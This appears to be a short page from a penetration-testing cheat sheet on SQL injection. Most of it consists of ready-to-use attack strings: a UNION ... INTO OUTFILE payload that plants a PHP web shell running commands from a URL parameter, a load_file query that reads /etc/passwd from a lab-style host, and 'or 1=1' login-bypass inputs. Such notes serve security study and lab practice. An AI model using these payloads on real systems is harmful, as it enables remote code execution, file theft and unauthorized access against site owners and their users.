SQL injection

SQL injection to RCE

Need to know the root document files on the web server

' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/backdoor.php'; -- -

LOAD_FILE() function

load_file() function in PHP in combination with SQLinjection can be used to retrieve sensitive files on the server. 

10.10.10.143/room.php?cod=999 UNION select 1,load_file('/etc/passwd'),3,4,5,6,7 -- ;

SQL injection - authentication bypass

or 1=1
or 1=1-- ;
or 1=1# ;
PreviousEscape restricted shell - LinuxNextProcedure

Last updated